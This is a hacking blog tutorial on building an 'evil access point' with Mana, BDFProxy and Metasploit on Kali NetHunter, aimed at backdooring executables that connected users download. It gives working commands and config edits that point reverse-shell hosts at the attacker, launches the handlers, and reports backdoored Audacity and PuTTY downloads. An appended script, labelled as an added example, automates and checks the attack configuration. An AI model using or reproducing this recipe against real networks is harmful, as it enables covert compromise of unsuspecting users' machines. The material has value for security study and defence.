Evil Access Point with Auto-Backdooring FTW
This post is about setting up an evil access point that automatically backdoors the executables that connected users download. Pretty neat, right? This tutorial is inspired by muts' NetHunter video showing BDFProxy on NetHunter.

I am using Kali NetHunter 2.0 running from a Nexus 9, with a TP-LINK TL-WN722N (the 150Mbps version) as my secondary network interface.

I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on the go. It's packed with lots of cool stuff like one-click scripts and HID keyboard attack capabilities, plus a bunch of the tools that Kali desktop comes with.

Tools

A few tools I will be using:

- Mana: a rogue access point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is that Mana responds to other APs' broadcasts instead of only to device probes like Karma does, but still with the end goal of tricking victims into connecting to an AP you own. Plus, it includes lots of other evil AP tricks baked right in. For more info on Mana I'd recommend watching the Defcon 22 talk where the tool was released.
- BackdoorFactory / BDFProxy: automatically patches binaries with malicious payloads on the fly via MITM.

False Start

Since I also want to provide victims with Internet access (so that I can backdoor their downloads), I need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TL-WN722N because of its low power usage and its compatibility with Kali (it supports packet injection).

I launched the Kali NetHunter menu and saw a promising looking menu item. Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one-click launcher working out of the box. It even contained a screen for bdfproxy.cfg, and when I started it there was even the option to start with BDF. But no dice. Even after correcting my upstream device from eth0 to wlan1 and double-checking the dhcpd settings in the config file, I couldn't get the thing to run. I couldn't find the output of either Mana or BDFProxy in the logs either.

Setting Up

So, off to the terminal. Home sweet home. I went into the Mana folder and skulked around a little bit:

    cd /usr/share/mana-toolkit/run-mana
    ls -lah

Aha! start-nat-simple-bdf-lollipop.sh looks promising. Let's have a look.

[screenshot: start-nat-simple-bdf-lollipop.sh]

Everything looks pretty straightforward actually, which was pleasantly surprising; I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with iptables, and off we go. The only thing that stumped me at first was the "Add fking rule to table 1006" comment. There are some config files mentioned in there, so let's make sure they are set up properly.

First stop is /etc/mana-toolkit/hostapd-karma.conf.

[screenshot: hostapd-karma.conf]

Next, let's look at /etc/mana-toolkit/dhcpd.conf.

[screenshot: dhcpd.conf]

Looks like we're using Google for DNS and putting our clients on the 10.0.0.0/24 range. Cool beans.

Let's also take a look at the BDFProxy config file at /etc/bdfproxy/bdfproxy.cfg (truncated to the important parts).

[screenshot: bdfproxy.cfg]

Looks like there is something slightly off here. The IPs configured for our reverse shells, 192.168.1.168 and 192.168.1.16, need to point back to us, and according to our dhcpd.conf settings they don't. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOST entries to point to us at 10.0.0.1. Quick replace with sed (replace the longer address first; doing 192.168.1.16 first would also rewrite the front of 192.168.1.168 and leave 10.0.0.18 behind):

    sed -i 's/192.168.1.168/10.0.0.1/g' bdfproxy.cfg
    sed -i 's/192.168.1.16/10.0.0.1/g' bdfproxy.cfg

[screenshot: the diffs]

Starting up the Machine

Ok, so it's time to start Mana up:

    cd /usr/share/mana-toolkit/run-mana
    ./start-nat-simple-bdf-lollipop.sh

In a new terminal we start BDFProxy:

    cd /etc/bdfproxy
    ./bdfproxy

Now that BDFProxy is up, it has created a Metasploit resource file. It wasn't entirely obvious at first where this file lived; it is not in /etc/bdfproxy. It turns out the file is here: /usr/share/bdfproxy/bdfproxy_msf_resource.rc. That resource file sets up the handlers for the reverse shells. Time to open another terminal, navigate there and start up Metasploit:

    cd /usr/share/bdfproxy
    service postgresql start
    cat bdfproxy_msf_resource.rc    # sanity check of contents: make sure the IP update took
    msfconsole -r bdfproxy_msf_resource.rc

After Metasploit is fired up we can see the resource file has loaded.

[screenshot: msfconsole with the resource file loaded]

Sweetness. Here is where I got stuck for a little bit. It appeared everything was set up and working properly. Mana was creating APs, and I could connect and get back out to the Internet. The iptables rules set up by Mana were correctly redirecting my traffic from port 80 to 8080, where BDFProxy was waiting. The problem was that BDFProxy was failing to transparently proxy connections (the mitmproxy underneath it was actually failing). I got this error on all HTTP connections from my laptop test machine connected to the evil AP:

    HttpError: 'Invalid HTTP request form (expected: absolute, got: relative)'

It turns out I missed changing one of the default bdfproxy.cfg settings. The line

    transparentProxy = None

needs to be changed to

    transparentProxy = transparent

After that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and downloaded a file over HTTP. I downloaded Audacity, and also tested by downloading PuTTY and PSFTP. Once BDFProxy gets its hooks in, the backdoor is dropped in place.

[screenshot: BDFProxy patching a download]

Here is the part that blew me away: executables inside zips are backdoored too, all done on the fly. How cool is that? For executable formats it not only works for Windows PE (exe) files, but also for Linux ELF and Mach-O (that means you, OS X). Very cool stuff.
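The two bdfproxy.cfg fixes above (every reverse-shell HOST must be the AP's own address, and transparentProxy must be "transparent") are exactly the kind of thing to check before starting Mana, BDFProxy and msfconsole, rather than after the first "expected: absolute, got: relative" error. The script below is an added example, not code from the original post or from the Mana or BDFProxy projects. It generalises the manual sed step by reading the router address out of dhcpd.conf's "option routers" line instead of hard-coding 10.0.0.1, rewrites the HOST lines wholesale so the ordering trap of the two substitutions cannot occur, and then re-reads the file to confirm. To keep it runnable offline it works on constructed sample copies of the two files in a temp directory; the file layouts are assumptions modelled on the fragments the post shows, and on a real NetHunter box you would point it at /etc/mana-toolkit/dhcpd.conf and /etc/bdfproxy/bdfproxy.cfg instead.

```shell
#!/bin/sh
# Added example, not from the original post: align bdfproxy.cfg with the
# evil AP's router address and verify it before launching anything.
# The dhcpd.conf and bdfproxy.cfg below are constructed samples modelled
# on the config fragments in the post; the real files live under
# /etc/mana-toolkit/ and /etc/bdfproxy/ (assumed NetHunter/Kali layout).
set -eu

WORK="${TMPDIR:-/tmp}/evilap-example.$$"
mkdir -p "$WORK"
trap 'rm -rf "$WORK"' EXIT

# Constructed sample of the Mana dhcpd.conf (same router and range as the post).
cat > "$WORK/dhcpd.conf" <<'EOF'
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 8.8.8.8, 8.8.4.4;
}
EOF

# Constructed sample of the relevant bdfproxy.cfg lines, still carrying the
# default 192.168.1.x reverse-shell HOSTs and transparentProxy = None.
cat > "$WORK/bdfproxy.cfg" <<'EOF'
[Overall]
transparentProxy = None

[targets]
  [[ALL]]
    [[[x86]]]
      HOST = 192.168.1.168
    [[[x64]]]
      HOST = 192.168.1.16
EOF

# The router address handed out by DHCP is the address victims reach us on.
router_ip() {
    sed -n 's/^[[:space:]]*option routers[[:space:]]*\([0-9.]*\);.*/\1/p' "$1" | head -n 1
}

# Rewrite every "HOST = ..." line to the router IP and switch to transparent
# mode. Replacing whole HOST lines avoids the ordering problem of substituting
# 192.168.1.16 before 192.168.1.168 (which would leave 10.0.0.18 behind).
patch_cfg() {
    cfg="$1"; ip="$2"
    sed -i \
        -e "s/^\([[:space:]]*HOST[[:space:]]*=[[:space:]]*\).*/\1$ip/" \
        -e 's/^\([[:space:]]*transparentProxy[[:space:]]*=[[:space:]]*\).*/\1transparent/' \
        "$cfg"
}

# Preflight: fail if any HOST still points elsewhere, or if transparentProxy
# is not "transparent" (the mitmproxy "expected: absolute, got: relative"
# error in the post is what you get when this line is left at None).
check_cfg() {
    cfg="$1"; ip="$2"
    re="$(printf '%s' "$ip" | sed 's/\./\\./g')"
    if grep -E '^[[:space:]]*HOST[[:space:]]*=' "$cfg" | grep -vE "=[[:space:]]*$re[[:space:]]*$" >/dev/null; then
        echo "a HOST entry in $cfg does not point at $ip" >&2
        return 1
    fi
    if ! grep -qE '^[[:space:]]*transparentProxy[[:space:]]*=[[:space:]]*transparent[[:space:]]*$' "$cfg"; then
        echo "transparentProxy in $cfg is not set to transparent" >&2
        return 1
    fi
    return 0
}

IP="$(router_ip "$WORK/dhcpd.conf")"
patch_cfg "$WORK/bdfproxy.cfg" "$IP"
check_cfg "$WORK/bdfproxy.cfg" "$IP" && echo "bdfproxy.cfg ready: all HOSTs -> $IP, transparent mode on"
```

Run it as root before the three terminals above; if check_cfg prints a complaint, fix the file before starting BDFProxy, because the Metasploit resource file it generates inherits whatever HOST values are in bdfproxy.cfg at that moment.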
Syndicated from the feed "Rob Fuller's broadcasted articles on Inoreader".